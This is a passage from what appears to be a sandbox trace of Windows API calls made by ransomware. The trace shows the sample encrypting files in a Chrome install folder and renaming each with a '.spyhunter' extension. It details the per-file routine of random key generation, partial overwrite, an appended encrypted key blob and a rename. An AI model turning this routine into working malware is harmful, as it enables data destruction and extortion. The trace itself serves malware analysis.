lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\da.pak.spyhunter" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\locales\\da.pak.spyhunter")) returned 1 [0176.682] GetProcessHeap () returned 0x2c0000 [0176.682] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb1c8 | out: hHeap=0x2c0000) returned 1 [0176.682] GetProcessHeap () returned 0x2c0000 [0176.682] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0176.682] GetProcessHeap () returned 0x2c0000 [0176.682] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ecc1a0 | out: hHeap=0x2c0000) returned 1 [0176.682] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57e4e0 | out: pbBuffer=0x57e4e0) returned 1 [0176.683] GetProcessHeap () returned 0x2c0000 [0176.683] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0176.683] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x57e4d8*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x57e4d8*=0x30) returned 1 [0176.683] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\cs.pak" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\locales\\cs.pak"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0176.683] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\cs.pak") returned 81 [0176.684] StrStrW (lpFirst="cs.pak", lpSrch=".txt") returned 0x0 [0176.684] GetProcessHeap () returned 0x2c0000 [0176.684] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0176.684] ReadFile (in: hFile=0xa0, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57e49c, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x57e49c*=0x2800, lpOverlapped=0x0) returned 1 [0176.693] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0176.693] WriteFile (in: hFile=0xa0, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x57e49c, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x57e49c*=0x2800, lpOverlapped=0x0) returned 1 [0176.693] GetProcessHeap () returned 0x2c0000 [0176.693] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0176.693] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0176.693] WriteFile (in: hFile=0xa0, lpBuffer=0x57e4dc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57e49c, lpOverlapped=0x0 | out: lpBuffer=0x57e4dc*, lpNumberOfBytesWritten=0x57e49c*=0x4, lpOverlapped=0x0) returned 1 [0176.720] WriteFile (in: hFile=0xa0, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57e49c, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x57e49c*=0x30, lpOverlapped=0x0) returned 1 [0176.720] CloseHandle (hObject=0xa0) returned 1 [0176.744] GetProcessHeap () returned 0x2c0000 [0176.744] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb1c8 [0176.744] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\cs.pak.spyhunter") returned 91 [0176.744] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\cs.pak" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\locales\\cs.pak"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\cs.pak.spyhunter" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\locales\\cs.pak.spyhunter")) returned 1 [0176.745] GetProcessHeap () returned 0x2c0000 [0176.745] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb1c8 | out: hHeap=0x2c0000) returned 1 [0176.745] GetProcessHeap () returned 0x2c0000 [0176.745] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0176.745] GetProcessHeap () returned 0x2c0000 [0176.746] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ecc0b0 | out: hHeap=0x2c0000) returned 1 [0176.746] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57e4e0 | out: pbBuffer=0x57e4e0) returned 1 [0176.746] GetProcessHeap () returned 0x2c0000 [0176.746] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0176.746] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x57e4d8*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x57e4d8*=0x30) returned 1 [0176.746] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer\\chrmstp.exe" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\installer\\chrmstp.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb0 [0176.746] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer\\chrmstp.exe") returned 88 [0176.746] StrStrW (lpFirst="chrmstp.exe", lpSrch=".txt") returned 0x0 [0176.747] GetProcessHeap () returned 0x2c0000 [0176.747] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0176.747] ReadFile (in: hFile=0xb0, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57e49c, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x57e49c*=0x2800, lpOverlapped=0x0) returned 1 [0176.853] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0176.853] WriteFile (in: hFile=0xb0, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x57e49c, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x57e49c*=0x2800, lpOverlapped=0x0) returned 1 [0176.853] GetProcessHeap () returned 0x2c0000 [0176.853] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0176.853] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0176.854] WriteFile (in: hFile=0xb0, lpBuffer=0x57e4dc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57e49c, lpOverlapped=0x0 | out: lpBuffer=0x57e4dc*, lpNumberOfBytesWritten=0x57e49c*=0x4, lpOverlapped=0x0) returned 1 [0176.991] WriteFile (in: hFile=0xb0, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57e49c, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x57e49c*=0x30, lpOverlapped=0x0) returned 1 [0176.991] CloseHandle (hObject=0xb0) returned 1 [0176.992] GetProcessHeap () returned 0x2c0000 [0176.992] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb1c8 [0176.992] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer\\chrmstp.exe.spyhunter") returned 98 [0176.992] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer\\chrmstp.exe" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\installer\\chrmstp.exe"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer\\chrmstp.exe.spyhunter" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\installer\\chrmstp.exe.spyhunter")) returned 1 [0176.993] GetProcessHeap () returned 0x2c0000 [0176.993] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb1c8 | out: hHeap=0x2c0000) returned 1 [0176.993] GetProcessHeap () returned 0x2c0000 [0176.993] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0176.993] GetProcessHeap () returned 0x2c0000 [0176.993] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e5e7c0 | out: hHeap=0x2c0000) returned 1 [0176.993] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57e4d8 | out: pbBuffer=0x57e4d8) returned 1 [0176.993] GetProcessHeap () returned 0x2c0000 [0176.993] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0176.993] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x57e4d0*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x57e4d0*=0x30) returned 1 [0176.993] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\default_apps\\external_extensions.json" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\default_apps\\external_extensions.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb0 [0176.994] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\default_apps\\external_extensions.json") returned 104 [0176.994] StrStrW (lpFirst="external_extensions.json", lpSrch=".txt") returned 0x0 [0176.994] GetProcessHeap () returned 0x2c0000 [0176.994] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0176.994] ReadFile (in: hFile=0xb0, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57e494, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x57e494*=0x4f2, lpOverlapped=0x0) returned 1 [0177.027] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0xfffffb0e, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0177.027] WriteFile (in: hFile=0xb0, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x4f2, lpNumberOfBytesWritten=0x57e494, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x57e494*=0x4f2, lpOverlapped=0x0) returned 1 [0177.027] GetProcessHeap () returned 0x2c0000 [0177.028] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0177.028] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0177.028] WriteFile (in: hFile=0xb0, lpBuffer=0x57e4d4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57e494, lpOverlapped=0x0 | out: lpBuffer=0x57e4d4*, lpNumberOfBytesWritten=0x57e494*=0x4, lpOverlapped=0x0) returned 1 [0177.028] WriteFile (in: hFile=0xb0, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57e494, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x57e494*=0x30, lpOverlapped=0x0) returned 1 [0177.028] CloseHandle (hObject=0xb0) returned 1 [0177.028] GetProcessHeap () returned 0x2c0000 [0177.028] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb1c8 [0177.028] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\default_apps\\external_extensions.json.spyhunter") returned 114 [0177.028] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\default_apps\\external_extensions.json" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\default_apps\\external_extensions.json"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\default_apps\\external_extensions.json.spyhunter" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\default_apps\\external_extensions.json.spyhunter")) returned 1 [0177.030] GetProcessHeap () returned 0x2c0000 [0177.030] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb1c8 | out: hHeap=0x2c0000) returned 1 [0177.030] GetProcessHeap () returned 0x2c0000 [0177.030] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0177.030] GetProcessHeap () returned 0x2c0000 [0177.030] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ee7160 | out: hHeap=0x2c0000) returned 1 [0177.030] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57e4d8 | out: pbBuffer=0x57e4d8) returned 1 [0177.030] GetProcessHeap () returned 0x2c0000 [0177.030] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0177.030] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x57e4d0*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x57e4d0*=0x30) returned 1 [0177.030] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\d3dcompiler_47.dll" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\d3dcompiler_47.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb0 [0177.031] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\d3dcompiler_47.dll") returned 85 [0177.031] StrStrW (lpFirst="d3dcompiler_47.dll", lpSrch=".txt") returned 0x0 [0177.031] GetProcessHeap () returned 0x2c0000 [0177.031] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0177.031] ReadFile (in: hFile=0xb0, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57e494, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x57e494*=0x2800, lpOverlapped=0x0) returned 1 [0177.119] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0177.119] WriteFile (in: hFile=0xb0, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x57e494, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x57e494*=0x2800, lpOverlapped=0x0) returned 1 [0177.119] GetProcessHeap () returned 0x2c0000 [0177.119] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0177.119] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0177.120] WriteFile (in: hFile=0xb0, lpBuffer=0x57e4d4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57e494, lpOverlapped=0x0 | out: lpBuffer=0x57e4d4*, lpNumberOfBytesWritten=0x57e494*=0x4, lpOverlapped=0x0) returned 1 [0177.212] WriteFile (in: hFile=0xb0, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57e494, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x57e494*=0x30, lpOverlapped=0x0) returned 1 [0177.212] CloseHandle (hObject=0xb0) returned 1 [0177.326] GetProcessHeap () returned 0x2c0000 [0177.326] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb1c8 [0177.326] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\d3dcompiler_47.dll.spyhunter") returned 95 [0177.326] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\d3dcompiler_47.dll" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\d3dcompiler_47.dll"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\d3dcompiler_47.dll.spyhunter" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\d3dcompiler_47.dll.spyhunter")) returned 1 [0177.328] GetProcessHeap () returned 0x2c0000 [0177.328] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb1c8 | out: hHeap=0x2c0000) returned 1 [0177.328] GetProcessHeap () returned 0x2c0000 [0177.328] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0177.328] GetProcessHeap () returned 0x2c0000 [0177.328] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ec9ed8 | out: hHeap=0x2c0000) returned 1 [0177.328] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57e4d0 | out: pbBuffer=0x57e4d0) returned 1 [0177.328] GetProcessHeap () returned 0x2c0000 [0177.329] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0177.329] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x57e4c8*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x57e4c8*=0x30) returned 1 [0177.329] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\chrome.exe.sig" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\chrome.exe.sig"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x9c [0177.330] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\chrome.exe.sig") returned 81 [0177.330] StrStrW (lpFirst="chrome.exe.sig", lpSrch=".txt") returned 0x0 [0177.330] GetProcessHeap () returned 0x2c0000 [0177.330] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0177.330] ReadFile (in: hFile=0x9c, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57e48c, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x57e48c*=0x57f, lpOverlapped=0x0) returned 1 [0177.419] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0xfffffa81, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0177.419] WriteFile (in: hFile=0x9c, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x57f, lpNumberOfBytesWritten=0x57e48c, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x57e48c*=0x57f, lpOverlapped=0x0) returned 1 [0177.419] GetProcessHeap () returned 0x2c0000 [0177.419] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0177.419] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0177.419] WriteFile (in: hFile=0x9c, lpBuffer=0x57e4cc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57e48c, lpOverlapped=0x0 | out: lpBuffer=0x57e4cc*, lpNumberOfBytesWritten=0x57e48c*=0x4, lpOverlapped=0x0) returned 1 [0177.419] WriteFile (in: hFile=0x9c, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57e48c, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x57e48c*=0x30, lpOverlapped=0x0) returned 1 [0177.419] CloseHandle (hObject=0x9c) returned 1 [0177.419] GetProcessHeap () returned 0x2c0000 [0177.419] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb1c8 [0177.419] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\chrome.exe.sig.spyhunter") returned 91 [0177.420] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\chrome.exe.sig" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\chrome.exe.sig"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\chrome.exe.sig.spyhunter" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\chrome.exe.sig.spyhunter")) returned 1 [0177.421] GetProcessHeap () returned 0x2c0000 [0177.421] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb1c8 | out: hHeap=0x2c0000) returned 1 [0177.421] GetProcessHeap () returned 0x2c0000 [0177.421] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0177.421] GetProcessHeap () returned 0x2c0000 [0177.421] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a9d30 | out: hHeap=0x2c0000) returned 1 [0177.421] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57e4d0 | out: pbBuffer=0x57e4d0) returned 1 [0177.421] GetProcessHeap () returned 0x2c0000 [0177.421] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0177.421] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x57e4c8*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x57e4c8*=0x30) returned 1 [0177.421] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\58.0.3029.110.manifest" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\58.0.3029.110.manifest"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x9c [0177.422] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\58.0.3029.110.manifest") returned 89 [0177.422] StrStrW (lpFirst="58.0.3029.110.manifest", lpSrch=".txt") returned 0x0 [0177.422] GetProcessHeap () returned 0x2c0000 [0177.422] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0177.422] ReadFile (in: hFile=0x9c, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57e48c, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x57e48c*=0xe2, lpOverlapped=0x0) returned 1 [0177.423] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0xffffff1e, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0177.423] WriteFile (in: hFile=0x9c, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0xe2, lpNumberOfBytesWritten=0x57e48c, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x57e48c*=0xe2, lpOverlapped=0x0) returned 1 [0177.423] GetProcessHeap () returned 0x2c0000 [0177.423] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0177.423] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0177.423] WriteFile (in: hFile=0x9c, lpBuffer=0x57e4cc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57e48c, lpOverlapped=0x0 | out: lpBuffer=0x57e4cc*, lpNumberOfBytesWritten=0x57e48c*=0x4, lpOverlapped=0x0) returned 1 [0177.423] WriteFile (in: hFile=0x9c, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57e48c, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x57e48c*=0x30, lpOverlapped=0x0) returned 1 [0177.423] CloseHandle (hObject=0x9c) returned 1 [0177.423] GetProcessHeap () returned 0x2c0000 [0177.423] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb1c8 [0177.424] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\58.0.3029.110.manifest.spyhunter") returned 99 [0177.424] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\58.0.3029.110.manifest" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\58.0.3029.110.manifest"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\58.0.3029.110.manifest.spyhunter" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\58.0.3029.110.manifest.spyhunter")) returned 1 [0177.424] GetProcessHeap () returned 0x2c0000 [0177.425] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb1c8 | out: hHeap=0x2c0000) returned 1 [0177.425] GetProcessHeap () returned 0x2c0000 [0177.425] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0177.425] GetProcessHeap () returned 0x2c0000 [0177.425] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e5dfc0 | out: hHeap=0x2c0000) returned 1 [0177.425] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57e4c8 | out: pbBuffer=0x57e4c8) returned 1 [0177.425] GetProcessHeap () returned 0x2c0000 [0177.425] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0177.425] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, 